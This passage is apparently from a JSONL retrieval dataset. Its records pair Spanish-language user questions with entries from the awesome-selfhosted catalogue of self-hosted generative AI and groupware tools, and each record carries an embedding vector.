-0.00995, 0.05343, 0.03517, -0.04783, 0.02046, -0.07331, -0.0737, 0.03862, -0.01288, -0.04928, -0.07536, -0.0006, 0.00443, -0.02443, 0.00858, -0.06186]} -{"tipo": "pregunta", "herramienta": "Generative Artificial Intelligence (GenAI)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Generative Artificial Intelligence (GenAI)", "tema": "generative artificial intelligence (genai)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Generative Artificial Intelligence (GenAI): Agenta β€” LLMOps platform for prompt management, LLM evaluation, and observability. Build, evaluate, and monitor production-grade LLM applications with collaborative prompt engineering [MIT, Docker]. AnythingLLM β€” All-in-one desktop & Docker AI application with built-in RAG, AI agents, No-code agent builder, MCP compatibility, and more [MIT, Nodejs/Docker]. GoModel β€” AI gateway written in Go with a unified OpenAI-compatible API for multiple LLM providers, USD cost tracking, budgets, usage analytics, guardrails, caching, and an admin dashboard [MIT, Go/Docker]. Khoj β€” Your AI second brain. Get answers from the web or your docs. Build custom agents, schedule automations, do deep research. Turn any online or local LLM into your personal, autonomous AI [AGPL-3.0, Python/Docker]. LibreChat β€” Enhanced ChatGPT-compatible AI chat interface supporting multiple AI providers, with multi-user auth, message search, and plugin support [⚠, MIT, Nodejs/Docker].", "indexar": "Existe alguna alternativa libre a GoModel o LibreChat que permita usar mΓΊltiples proveedores de LLM?", "v": [-0.11235, 0.12053, -0.07674, -0.02989, -0.14361, -0.02989, 0.02025, -0.02959, -0.28308, -0.15701, -0.05333, -0.02958, 0.01694, -0.01042, 0.13372, -0.01953, -0.01532, -0.20003, -0.02855, -0.09064, 0.00475, 0.06074, -0.15659, -0.14842, -0.10583, 0.03728, 0.1116, -0.1702, -0.05652, 0.06105, -0.05942, -0.01912, -0.00304, 0.02625, -0.02312, -0.08187, 0.07697, 0.00617, 0.04467, 0.00436, 0.25818, -0.02944, -0.10101, 0.00397, 0.07616, -0.0183, -0.09023, 0.0251, -0.0724, 0.02358, -0.01856, -0.01883, -0.0683, -0.01367, 0.08509, 0.03015, 0.16869, -0.08248, -0.06703, -0.04724, -0.01835, -0.01405, 0.1181, -0.10161, -0.02059, 0.06366, -0.0853, 0.02863, -0.07696, 0.01946, 0.01764, 0.01564, 0.05254, -0.01044, -0.06964, 0.08983, -0.1072, 0.03487, 0.0245, 0.11069, 0.03421, -0.07878, 0.02476, 0.03981, -0.02293, -0.08596, 0.1397, -0.02374, 0.05575, -0.01335, -0.00556, 0.06194, -0.03126, 0.11882, 0.04559, -0.08765, -0.01229, 0.02554, 0.04258, 0.06355, 0.0992, 0.08022, -0.01377, 0.02675, -0.04896, -0.02733, 0.06992, -0.05793, -0.06151, 0.01374, 0.016, 0.02494, 0.00408, 0.00341, -0.02939, -0.02579, -0.04738, -0.05197, 0.01516, -0.00057, 0.00557, 0.04797, -0.00107, -0.01954, 0.05915, -0.0159, -0.02656, 0.08655, -0.06311, -0.03948, 0.04406, -0.00125, -0.05023, -0.02377, -0.07593, -0.01163, 0.10269, -0.0058, 0.0145, -0.03494, 0.00538, 0.02358, 0.01965, -0.03057, 0.06555, -0.00259, -0.01881, -0.07943, 0.00145, 0.00055, -0.01874, 0.07793, 0.03612, 0.06294, -0.05205, 0.002, -0.01837, -0.09914, -0.04004, 0.06784, 0.00338, 0.01145, 0.00624, 0.05063, -0.02225, 0.00839, -0.00577, -0.03089, -0.03571, 0.03232, -0.00893, 0.05248, 0.02788, -0.05335, 0.01056, -0.04791, -0.00568, -0.07461, 0.01767, -0.11519, 0.00823, 0.03589, -0.09784, 0.00757, -0.03117, -0.0561, 0.00965, 0.02102, 0.01489, 0.05046, -0.05024, 0.07962, -0.02636, -0.11653, 0.00413, -0.03327, -0.01285, -0.08567, 0.00258, -0.04613, -0.08206, 0.03929, -0.01803, -0.01938, 0.03313, 0.0424, -0.03218, 0.06944, 0.03733, 0.07261, 0.05343, -0.06178, 0.10587, -0.06415, 0.01822, -0.02644, 0.04241, -0.05723, 0.03134, -0.0208, 0.02376, 0.0169, 0.05468, 0.01572, 0.0324, -0.00104, 0.03658, 0.05236, -0.01406, 0.07457, -0.00233, 0.04793, -0.00773, -0.04396, 0.02375, -0.02426, 0.01434, 0.02852, 0.00308, -0.0461, 0.03744, 0.04145, -0.04073, 0.01295, -0.01071, 0.00477, -0.11193, 0.01121, -0.0156, -0.04017, -0.02975, 0.08091, -0.02037, -0.02277, -0.00117, -0.02232]} -{"tipo": "pregunta", "herramienta": "Generative Artificial Intelligence (GenAI)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Generative Artificial Intelligence (GenAI)", "tema": "generative artificial intelligence (genai)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Generative Artificial Intelligence (GenAI): LLM Harbor β€” Containerized LLM toolkit. Run LLM backends, APIs, frontends, and additional services via a concise CLI [Apache-2.0, Docker/Shell]. LLMKube β€” Kubernetes operator for self-hosted LLM inference with pluggable runtimes (llama.cpp, vLLM, TGI, Ollama, vllm-swift), multi-GPU sharding, NVIDIA CUDA + Apple Silicon Metal support, and OpenAI-compatible API [Apache-2.0, Go/Docker/K8S]. Local Deep Research β€” AI-powered deep research tool with multi-source search (arXiv, PubMed, web), PDF text extraction, and encrypted local storage [MIT, Docker/Python]. LocalAI β€” Run your AI models locally and generate images and audio (alternative to OpenAI and Claude) [MIT, Docker/K8S]. Ollama β€” Get up and running with Llama 3.3, DeepSeek-R1, Phi-4, Gemma 3, and other large language models [MIT, Docker/Python]. Onyx Community Edition β€” Chat UI that works with any LLM. It comes loaded with advanced features like agents, web search, RAG, MCP, deep research, Connectors to 40+ knowledge sources, and more [MIT, Docker/K8S].", "indexar": "con que puedo ejecutar modelos de lenguaje grandes en mi propio ordenador?", "v": [0.01602, 0.09539, -0.02706, -0.16211, -0.09107, -0.03282, -0.02545, 0.05159, -0.12825, -0.10185, -0.00121, 0.07205, 0.02552, -0.0214, 0.08114, -0.04979, 0.13133, -0.09768, -0.03671, -0.0749, 0.06526, -0.04996, -0.0921, -0.05126, 0.09206, 0.05389, 0.05603, 0.04392, -0.00486, 0.02445, -0.11357, 0.12099, 0.11526, -0.14596, -0.09044, 0.06903, -0.03908, 0.08069, -0.01163, 0.07077, 0.11639, 0.03768, -0.03752, 0.07502, 0.16696, 0.03576, 0.03814, -0.09595, -0.01719, -0.07604, -0.00209, -0.09158, -0.01994, -0.00908, -0.00764, -0.07179, 0.20696, -0.0343, 0.0508, -0.13017, -0.03824, 0.06528, 0.05174, 0.01504, 0.0836, 0.03184, -0.0303, 0.01797, 0.00469, -0.03282, -0.11109, -0.00908, -0.00682, -0.05817, 0.08484, -0.00217, -0.02695, -0.06603, 0.15784, 0.08954, 0.04031, -0.08527, -0.13569, -0.02975, -0.04417, 0.00238, -0.01804, -0.10359, 0.05174, -0.03694, 0.0127, 0.03705, -0.10818, -0.05809, -0.0349, 0.02333, 0.06224, -0.01034, -0.00715, 0.05664, 0.05792, -0.05554, -0.05964, 0.11342, -0.04305, 0.05285, 0.11058, -0.03679, 0.06594, -0.07669, 0.06116, -0.00723, -0.00564, -0.18288, -0.07719, -0.04189, 0.08247, -0.05824, -0.01975, -0.00339, -0.0518, 0.02295, 0.00575, 0.02515, -0.01507, -0.05331, 0.06887, 0.08351, -0.02396, -0.02938, 0.01323, 0.01532, 0.14542, -0.06633, -0.03578, 0.11713, 0.02156, -0.07127, 0.04232, -0.15116, 0.0242, 0.06378, -0.02434, -0.02456, 0.01571, 0.03191, 0.09488, -0.09427, -0.08737, -0.03535, 0.08544, 0.02695, 0.08115, 0.06562, -0.03168, -0.0274, 0.01905, 0.05422, 0.03739, 0.02592, -0.03544, 0.073, -0.01714, -0.00107, 0.06721, -0.00308, -0.06626, -0.01644, 0.10006, 0.03295, -0.00166, -0.0027, 0.02383, -0.02105, 0.0144, 0.04153, -0.01176, 0.03, -0.0277, -0.04532, -0.07334, 0.08864, -0.10293, -0.03969, -0.02208, -0.02381, -0.01257, -0.00729, -0.07423, -0.02683, -0.04682, 0.07323, -0.0068, -0.08699, 0.05381, -0.02769, -0.05591, 0.02341, 0.03952, -0.05468, -0.05358, 0.02297, -0.02066, -0.01708, 0.01814, 0.11016, -0.04836, 0.00904, -0.04528, 0.093, -0.01334, 0.01597, -0.00629, -0.0163, -0.01825, 0.00653, -0.01608, 0.02009, 0.04673, -0.02568, 0.02095, 0.00264, 0.11949, 0.00391, -0.00641, -0.07057, -0.01696, -0.00812, 0.03204, -0.02677, -0.01349, 0.03681, -0.00978, -0.02209, -0.01125, 0.0154, 0.01723, 0.02572, -0.02144, 0.01043, 0.01048, 0.07081, -0.01526, -0.0975, -0.04369, -0.03933, -0.1166, -0.03074, -0.0275, -0.04593, -0.00285, 0.01063, 0.01267, -0.07465, -0.00726, 0.03992]} -{"tipo": "pregunta", "herramienta": "Generative Artificial Intelligence (GenAI)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Generative Artificial Intelligence (GenAI)", "tema": "generative artificial intelligence (genai)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Generative Artificial Intelligence (GenAI): LLM Harbor β€” Containerized LLM toolkit. Run LLM backends, APIs, frontends, and additional services via a concise CLI [Apache-2.0, Docker/Shell]. LLMKube β€” Kubernetes operator for self-hosted LLM inference with pluggable runtimes (llama.cpp, vLLM, TGI, Ollama, vllm-swift), multi-GPU sharding, NVIDIA CUDA + Apple Silicon Metal support, and OpenAI-compatible API [Apache-2.0, Go/Docker/K8S]. Local Deep Research β€” AI-powered deep research tool with multi-source search (arXiv, PubMed, web), PDF text extraction, and encrypted local storage [MIT, Docker/Python]. LocalAI β€” Run your AI models locally and generate images and audio (alternative to OpenAI and Claude) [MIT, Docker/K8S]. Ollama β€” Get up and running with Llama 3.3, DeepSeek-R1, Phi-4, Gemma 3, and other large language models [MIT, Docker/Python]. Onyx Community Edition β€” Chat UI that works with any LLM. It comes loaded with advanced features like agents, web search, RAG, MCP, deep research, Connectors to 40+ knowledge sources, and more [MIT, Docker/K8S].", "indexar": "hay alguna alternativa libre a OpenAI para generar imΓ‘genes y audio localmente?", "v": [-0.05756, 0.24846, -0.0871, -0.08418, -0.14411, -0.09824, -0.04658, -0.01042, -0.11274, -0.11683, -0.06742, -0.2253, -0.04865, 0.06208, 0.15411, -0.03466, 0.0774, -0.09395, 0.04474, -0.0106, -0.08762, 0.14731, -0.10627, -0.07401, 0.05114, -0.0733, -0.02309, -0.06258, -0.04109, 0.01425, 0.05081, 0.03313, 0.07002, 0.01254, -0.19213, -0.05849, 0.13371, 0.01945, 0.09866, -0.03859, 0.03068, -0.06864, -0.07732, 0.12596, 0.00602, 0.01978, -0.07142, 0.06362, -0.04804, -0.02506, 0.01265, -0.02153, -0.03733, -0.00605, 0.1025, -0.00625, 0.08349, -0.13033, -0.02974, -0.05952, -0.04864, 0.10886, -0.01971, -0.04487, 0.01471, 0.14801, 0.05689, 0.04085, -0.05922, 0.12325, -0.00881, -0.04691, 0.09855, 0.03733, -0.05389, 0.06987, -0.15353, -0.09568, -0.0513, 0.05443, -0.00394, -0.07964, 0.06705, -0.04279, -0.13162, 0.02912, 0.08119, -0.03419, -0.00242, 0.00161, 0.0169, 0.04429, 0.10758, 0.08131, 0.01382, -0.06348, 0.01491, 0.07135, -0.02445, 0.0404, 0.05326, -0.03247, -0.03599, -0.06195, 0.07348, -0.03856, 0.04757, -0.06046, -0.04034, 0.02458, -0.01973, 0.04314, -0.00033, 0.05685, -0.10797, -0.12813, 0.02093, -0.03623, 0.09065, 0.06403, 0.01836, -0.02138, -0.05161, -0.0264, -0.13436, -0.00155, -0.00535, 0.00216, -0.08406, 0.02103, 0.01634, -0.03431, 0.00136, -0.10858, -0.06971, -0.07829, 0.14059, -0.02278, 0.02091, -0.00277, -0.05369, 0.04001, 0.02756, -0.07018, -0.03584, -0.01845, -0.01508, -0.07565, -0.05137, -0.03527, -0.03284, -0.01507, -0.02618, -0.00916, 0.00271, 0.08435, -0.04543, -0.01174, -0.01656, 0.04522, -0.02918, 0.0148, 0.02492, 0.04199, -0.04177, -0.02163, -0.04572, -0.02958, -0.04677, -0.03003, -0.01442, 0.05542, 0.01027, -0.09214, 0.02802, -0.03742, 0.03986, -0.10618, 0.0299, -0.04568, 0.02638, 0.01576, -0.03663, 0.01364, 0.00143, 0.00749, -0.00832, -0.00411, -0.0561, -0.01043, -0.05485, -0.01559, -0.04825, -0.03881, 0.04941, -0.02336, -0.0205, 0.00278, -0.07367, 0.05977, -0.0965, -0.04385, -0.01561, -0.03769, -0.02019, 0.00852, -0.02087, 0.06613, -0.00144, 0.04887, 0.01907, 0.00602, 0.01618, -0.00418, -0.01983, 0.04747, -0.02431, -0.01291, -0.05907, -0.003, 0.0307, 0.06609, 0.07462, 0.0593, 0.06263, 0.05812, 0.00847, 0.00085, 0.0382, -0.015, 0.04024, 0.06149, -0.00018, 0.01183, -0.00039, 0.02574, -0.01981, 0.05915, 0.00552, -0.05825, 0.05941, 0.06339, -0.04503, 0.00266, -0.02459, -0.04067, -0.04988, -0.02256, 0.0182, -0.08787, -0.04341, 0.07646, 0.01309, -0.0007, 0.00045, -0.02182]} -{"tipo": "pregunta", "herramienta": "Generative Artificial Intelligence (GenAI)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Generative Artificial Intelligence (GenAI)", "tema": "generative artificial intelligence (genai)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Generative Artificial Intelligence (GenAI): LLM Harbor β€” Containerized LLM toolkit. Run LLM backends, APIs, frontends, and additional services via a concise CLI [Apache-2.0, Docker/Shell]. LLMKube β€” Kubernetes operator for self-hosted LLM inference with pluggable runtimes (llama.cpp, vLLM, TGI, Ollama, vllm-swift), multi-GPU sharding, NVIDIA CUDA + Apple Silicon Metal support, and OpenAI-compatible API [Apache-2.0, Go/Docker/K8S]. Local Deep Research β€” AI-powered deep research tool with multi-source search (arXiv, PubMed, web), PDF text extraction, and encrypted local storage [MIT, Docker/Python]. LocalAI β€” Run your AI models locally and generate images and audio (alternative to OpenAI and Claude) [MIT, Docker/K8S]. Ollama β€” Get up and running with Llama 3.3, DeepSeek-R1, Phi-4, Gemma 3, and other large language models [MIT, Docker/Python]. Onyx Community Edition β€” Chat UI that works with any LLM. It comes loaded with advanced features like agents, web search, RAG, MCP, deep research, Connectors to 40+ knowledge sources, and more [MIT, Docker/K8S].", "indexar": "con que herramienta puedo hacer investigaciones profundas con IA usando fuentes como arXiv o PubMed sin guardar datos en la nube?", "v": [-0.02896, -0.00715, -0.17674, -0.11634, 0.03854, -0.03066, -0.04211, -0.08906, -0.16479, -0.10121, -0.00529, -0.02008, -0.0876, -0.03888, -0.13647, 0.00438, 0.06959, -0.10799, -0.01427, -0.00904, 0.01063, -0.00983, -0.13342, -0.06094, -0.16659, -0.04863, -0.00574, 0.01744, -0.09591, 0.00513, -0.13525, 0.03923, -0.00463, 0.00737, -0.2176, -0.03515, -0.02564, 0.10151, -0.10024, -0.03292, -0.08879, 0.05854, -0.09904, 0.10356, 0.07292, 0.01149, -0.14337, -0.03239, -0.03092, 0.09776, -0.11965, -0.04366, -0.09632, -0.02928, -0.12219, -0.12212, 0.04501, -0.07659, 0.06288, -0.03215, -0.13039, 0.0579, -0.00017, 0.01376, 0.10682, -0.0202, 0.03041, -0.04872, -0.10496, 0.07602, -0.03389, 0.08259, 0.00686, -0.02273, 0.03898, 0.00317, 0.03774, 0.00647, -0.01817, 0.04231, -0.0896, 0.06444, -0.09458, 0.00436, -0.06205, -0.05587, 0.13672, -0.056, -0.0724, -0.02596, -0.03742, 0.01746, -0.03038, 0.13506, 0.03557, 0.00303, 0.01685, 0.01171, -0.07214, -0.01596, 0.12624, 0.02456, -0.03845, 0.04382, -0.03407, 0.04219, -0.03533, -0.09044, -0.02428, 0.02101, 0.0363, 0.02137, -0.05619, -0.00666, -0.01228, 0.06813, 0.07033, -0.04652, -0.04591, -0.00541, 0.02379, -0.0079, -0.05581, 0.05099, -0.03298, -0.09903, -0.08764, 0.09935, -0.00696, -0.04249, -0.03328, 0.05037, -0.01117, 0.04458, 0.07473, -0.0286, -0.06642, -0.15928, 0.06716, -0.10485, 0.03475, 0.00725, -0.00648, 0.01566, 0.06936, -0.00807, 0.0279, 0.00858, -0.04684, -0.0567, 0.02302, -0.0286, -0.02506, 0.05574, -0.10029, 0.05413, 0.00698, -0.00752, -0.12528, 0.00697, 0.02086, 0.0081, -0.03753, 0.01902, 0.03572, -0.04927, 0.03853, -0.01544, 0.0453, 0.12633, -0.05422, -0.04555, 0.04314, -0.10552, 0.07655, -0.07288, -0.02531, -0.12928, 0.05136, -0.0222, -0.0357, -0.05937, 0.00933, -0.00343, -0.01433, -0.02415, 0.04616, -0.02761, -0.00186, 0.01336, -0.01613, 0.03248, -0.00275, 0.00712, 0.12854, -0.08396, -0.03003, -0.00356, 0.02737, 0.01438, -0.04797, 0.06376, -0.03477, -0.03471, 0.03612, 0.01763, -0.09751, 0.01398, -0.00918, -0.02101, -0.01427, -0.02205, -0.02526, -0.04323, -0.06036, -0.03116, 0.01575, -0.02325, -0.05838, -0.00029, -0.0609, 0.00393, 0.03946, -0.06163, 0.01169, 0.04814, 0.0258, 0.0262, 0.03968, -0.00427, 0.03451, 0.02799, -0.07269, -0.03058, 0.05953, 0.04032, -0.01278, 0.01265, -0.02844, -0.06369, 0.01461, 0.03404, -0.00938, -0.02368, -0.04578, -0.07904, -0.07551, 0.05928, 0.01519, -0.07856, 0.01152, 0.05291, 0.04388, -0.09071, 0.08751, -0.05393]} -{"tipo": "pregunta", "herramienta": "Generative Artificial Intelligence (GenAI)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Generative Artificial Intelligence (GenAI)", "tema": "generative artificial intelligence (genai)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Generative Artificial Intelligence (GenAI): Open-WebUI β€” User-friendly AI Interface, supports Ollama, OpenAI API [BSD-3-Clause, Docker/Python]. Vane β€” AI-powered search engine (alternative to Perplexity AI) [MIT, Docker].", "indexar": "que interfaz es amigable para usar modelos de IA generativa desde mi propia red?", "v": [0.04051, 0.04052, -0.09311, -0.05742, 0.1277, 0.03551, -0.0969, -0.05783, -0.11801, -0.08863, -0.08316, -0.04984, -0.05918, -0.01536, 0.10806, 3e-05, 0.0574, -0.06831, 0.05262, -0.04621, 0.00957, 0.05877, -0.17659, -0.04744, -0.05317, 0.10234, 0.05092, -0.05079, 0.01182, 0.00561, -0.03657, -0.01754, 0.15478, -0.07732, -0.18669, -0.09355, -0.02434, 0.01296, -0.01502, -0.05083, 0.11205, -0.00878, -0.10294, 0.01701, 0.17555, 0.12146, -0.08349, -0.00725, -0.19041, 0.09036, -0.13706, -0.11381, -0.01449, 0.02267, -0.02156, -0.10789, 0.15382, -0.11503, -0.0764, -0.02103, -0.03214, 0.04254, -0.06848, 0.10787, 0.03992, -0.1349, -0.09563, -0.01885, -0.04163, -0.01387, 0.04615, 0.04355, -0.03065, -0.06264, 0.09917, 0.07413, -0.02967, -0.02367, 0.16627, 0.04654, 0.05821, -0.04189, -0.11524, -0.00031, 0.00076, 0.01185, 0.10765, -0.04889, -0.01991, 0.00378, -0.03193, -0.05354, 0.01887, -0.04039, -0.0183, -0.0603, -0.03689, 0.10609, 0.10075, -0.03835, -0.01214, -0.03237, -0.0013, 0.06254, 0.04008, -0.02397, 0.06089, -0.09231, 0.06334, 0.00588, 0.06409, -0.03888, 0.04333, -0.01304, -0.00327, 0.0082, 0.02576, -0.03223, -0.05499, -0.10082, -0.02498, -0.04975, -0.00177, -0.00586, 0.00121, -0.01082, -0.0468, 0.03802, -0.02216, 0.00955, -0.07963, -0.02319, -0.03087, -0.13249, -0.0243, 0.06072, -0.09465, -0.08167, 0.05882, -0.09827, 0.03919, 0.08736, 0.01147, -0.07644, -0.00061, 0.07244, 0.02622, -0.12302, 0.01332, 0.04553, 0.03183, -0.00891, 0.02868, -0.03762, -0.06576, 0.04535, 0.02664, -0.00307, 0.00173, 0.03019, -0.02136, 0.00478, 0.006, -0.01746, 0.06883, -0.07383, -0.06924, 0.00503, 0.06416, 0.00569, 0.05231, 0.02363, -0.01574, -0.03184, 0.02489, -0.0255, -0.03062, -0.07318, 0.01076, -0.03415, -0.0163, 0.05132, -0.078, -0.0486, -0.04258, -0.09471, -0.00248, -0.00468, 0.05831, 0.0235, -0.01699, 0.0896, 0.06981, 0.03741, 0.03048, -0.01393, 0.00151, 0.00686, -0.00602, -0.02214, -0.00968, 0.02907, -0.01727, -0.0694, 0.07139, 0.00069, -0.06011, 0.05958, 0.03016, 0.04197, 0.0267, 0.02386, 0.10712, 0.01841, -0.02793, -0.01128, 0.04623, -0.03132, 0.08163, -0.02303, 0.06778, 0.02573, 0.02085, 0.03966, -0.00764, -0.00902, -0.05067, -0.01943, 0.04381, -0.01422, 0.01856, 0.03354, -0.00216, -0.10124, -0.03419, 0.0073, 0.0766, 0.03155, -0.05374, -0.09158, 0.04155, 0.05292, -0.02354, -0.02097, 0.01032, -0.09641, -0.13447, 0.05744, 0.04148, -0.06311, -0.04094, 0.0459, 0.07078, -0.04138, 0.0137, -0.01505]} -{"tipo": "pregunta", "herramienta": "Generative Artificial Intelligence (GenAI)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Generative Artificial Intelligence (GenAI)", "tema": "generative artificial intelligence (genai)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Generative Artificial Intelligence (GenAI): Open-WebUI β€” User-friendly AI Interface, supports Ollama, OpenAI API [BSD-3-Clause, Docker/Python]. Vane β€” AI-powered search engine (alternative to Perplexity AI) [MIT, Docker].", "indexar": "cual es una alternativa libre a Perplexity que pueda ejecutar en un servidor?", "v": [-0.03681, 0.06168, -0.16281, -0.02373, -0.05934, -0.10812, 0.12419, -0.14497, -0.0855, -0.15253, -0.09326, -0.01937, -0.00885, -0.04477, 0.09157, -0.01513, 0.05333, -0.05127, 0.15563, -0.00277, -0.00128, 0.05665, -0.05433, -0.13712, -0.04827, 0.0287, 0.03841, 0.02231, -0.10846, -0.07226, -0.00053, 0.00649, 0.04886, -0.07148, 0.09926, 0.01068, 0.01392, 0.17169, 0.03166, -0.00545, 0.02117, 0.01725, -0.0792, 0.06351, 0.00526, -0.02051, -0.05235, -0.02317, 0.01822, -0.035, -0.03867, -0.04126, -0.18854, -0.00437, 0.06706, 0.02336, 0.12419, -0.18034, 0.0165, -0.00369, -0.08095, 0.02694, -0.00025, -0.1103, 0.07663, 0.03835, -0.11632, 0.01406, -0.05728, 0.01516, -0.03894, -0.02773, -0.01249, -0.00972, -0.08066, 0.0619, -0.06819, -0.0851, 0.0308, 0.09425, 0.06876, -0.02278, -0.05856, 0.13692, -0.08323, -0.10931, -0.00508, -0.11772, 0.0709, 0.07031, 0.13352, 0.00149, -0.05, 0.10687, 0.02328, -0.01371, 0.1187, 0.07201, -0.0136, 0.05002, 0.09624, 0.09363, -0.1362, 0.00225, 0.02733, 0.06855, 0.0256, 0.04312, 0.02427, -0.05207, 0.03238, 0.0167, 0.00981, -0.02105, -0.06303, -0.12061, -0.051, -0.03153, 0.05118, 0.05865, -0.06666, -0.02739, -0.00119, -0.03915, 0.03005, -0.04594, 0.07483, 0.0247, -0.00761, -0.02386, 0.00202, -0.01786, -0.01836, -0.07701, -0.05326, 0.0478, 0.14815, -0.05322, -0.04677, -0.05946, 0.07357, 0.00699, 0.02696, 0.00753, 0.09255, -0.00927, 0.06801, -0.07987, -0.06148, -0.00157, 0.0287, -0.04925, -0.05407, 0.08762, -0.09825, -0.01159, -0.04154, -0.05737, -0.03105, 0.1151, 0.04157, 0.00393, 0.01678, 0.04626, 0.00976, -0.02447, -0.00687, 0.00877, -0.00675, 0.04559, -0.03364, 0.04194, 0.03271, -0.06599, 0.04954, -0.09585, -0.09033, -0.07845, 0.03459, 0.01423, 0.00705, -0.0045, -0.08376, -0.03857, -0.0471, -0.03205, 0.00956, -0.00118, -0.00648, 0.01788, 0.01195, 0.01456, -0.1236, -0.05489, 0.06211, -0.01062, -0.00881, -0.05729, -0.01393, -0.04169, -0.04761, -0.05515, -0.02869, -0.03679, -0.00992, 0.02249, -0.07142, 0.06449, -0.05831, 0.08655, 0.01945, -0.01269, 0.13668, -0.03123, -0.07256, -0.01078, 0.09362, -0.06765, 0.01439, -0.00175, -0.01774, 0.01677, 0.0322, -0.02958, -0.00219, 0.0023, 0.02486, 0.02814, 0.00215, -0.00192, -0.03177, 0.00977, -0.03446, 0.02017, 0.02136, 0.0256, 0.02943, -0.03034, -0.01213, -0.07492, 0.07417, 0.13043, -0.04852, -0.05041, -0.01797, -0.06923, -0.07504, -0.01472, -0.03998, -0.09221, -0.03564, 0.02772, 0.02985, -0.04604, 0.02658, -0.01106]} -{"tipo": "pregunta", "herramienta": "Generative Artificial Intelligence (GenAI)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Generative Artificial Intelligence (GenAI)", "tema": "generative artificial intelligence (genai)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Generative Artificial Intelligence (GenAI): Open-WebUI β€” User-friendly AI Interface, supports Ollama, OpenAI API [BSD-3-Clause, Docker/Python]. Vane β€” AI-powered search engine (alternative to Perplexity AI) [MIT, Docker].", "indexar": "con que programa puedo montar una bΓΊsqueda impulsada por IA que funcione como un motor de bΓΊsqueda personal?", "v": [0.07688, 0.12776, -0.20437, -0.1601, -0.04531, -0.0478, -0.01521, 0.02574, -0.17613, -0.18915, 0.06983, -0.00197, 0.12613, -0.02306, -0.05115, 0.00216, 0.10805, -0.12758, -0.00886, 0.0198, -0.02279, -0.00095, -0.05016, -0.11621, -0.01521, 0.07439, -0.06447, 0.00212, -0.13654, -0.09942, -0.04928, 0.06358, 0.11578, 0.01081, -0.08266, -0.1928, -0.00794, -0.00866, 0.08468, -0.0219, -0.00065, 0.02002, -0.10462, 0.04319, -0.00565, 0.06893, 0.12025, -0.12698, -0.03767, -0.00088, -0.01924, -0.0167, 0.04587, 0.03011, 0.04749, -0.07659, 0.05093, -0.09951, -0.00092, -0.03604, -0.02496, -0.00238, -0.02015, 0.07569, -0.0242, 0.00898, 0.18104, -0.0848, -0.05026, -0.01792, -0.14329, -0.04318, -0.07297, -0.03736, 0.04258, 0.0875, 0.10051, -0.0205, 0.03826, 0.0553, 0.01383, -0.02514, -0.05043, 0.08227, -0.09413, 0.02747, 0.12954, -0.14467, 0.04811, -0.01428, 0.00521, -0.01787, 0.01484, 0.11012, -0.02324, 0.00599, 0.07688, 0.08672, 0.0495, 0.03583, 0.04347, -0.0837, -0.01256, 0.12535, 0.06345, 0.00105, 0.16224, 0.00123, -0.04751, 0.06799, 0.01788, -0.02302, -0.05629, -0.02629, -0.09501, 0.0027, -0.11233, -0.04068, 0.01166, -0.038, -0.12402, 0.08736, -0.01773, 0.06142, 0.08124, 0.00819, -0.02667, 0.07388, -0.01716, -0.00948, 0.13904, 0.06033, -0.01586, -0.07762, -0.00122, -0.02982, -0.06136, 0.03008, 0.06431, -0.05368, 0.11636, 0.01241, 0.06471, -0.05567, 0.02424, -0.01782, 0.0068, -0.05839, 0.01388, -0.02974, -0.0342, -0.0214, 0.09088, 0.05537, -0.1227, -0.00438, 0.03603, 0.01665, 0.02763, 0.03219, -0.0252, 0.04818, -0.05105, -0.02874, 0.09131, 0.04218, -0.04102, -0.02069, 0.02845, 0.02758, -0.08313, -0.00816, 0.0059, -0.05393, 0.0639, 0.061, -0.00872, -0.06937, 0.05682, 0.01237, -0.09219, 0.07246, 0.00503, 0.00442, -0.02818, -0.02123, 0.03719, 0.00185, -0.00929, -0.05403, 0.03833, -0.03772, -0.0409, 0.00967, -0.02328, -0.00286, -0.0481, 0.07502, 0.06355, -0.02084, -0.07088, -0.02033, -0.03439, 0.01285, 0.00833, -0.00474, -0.00854, 0.00484, 0.05886, 0.03016, -0.0051, -0.01801, 0.03281, -0.0338, -0.06955, 0.00062, -0.03127, -0.0356, 0.00492, 0.07269, 0.01295, -0.01773, 0.04931, 0.06214, 0.00685, -0.02469, 0.01419, 0.00918, 0.03422, 0.00809, 0.02745, -0.00357, -0.03639, -0.04994, 0.01698, 0.02485, -0.01318, 0.04008, -0.06104, -0.01312, 0.03077, 0.05368, 0.00444, -0.05162, 0.00238, -0.03886, -0.04482, 0.03319, 0.06294, 0.00336, -0.05157, 0.03028, -0.04336, -0.02792, 0.07249, -0.03878]} -{"tipo": "pregunta", "herramienta": "Groupware", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Groupware", "tema": "groupware", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Groupware: Citadel β€” Groupware including email, calendar/scheduling, address books, forums, mailing lists, IM, wiki and blog engines, RSS aggregation and more [GPL-3.0, C/Docker/Shell]. Colanode β€” Collaboration suite with real-time messaging, rich text pages, file management, and dynamic databases - built for offline work (alternative to Slack, Notion) [Apache-2.0, K8S/Docker]. Cozy Cloud β€” Personal cloud where you can manage and sync your files, notes, contacts, passwords, and documents [GPL-3.0, Nodejs]. Digipad β€” An online self-hosted application for creating collaborative digital notepads (Documentation in french) [AGPL-3.0, Nodejs]. Digistorm β€” Create collaborative surveys, quizzes, brainstorms, and word 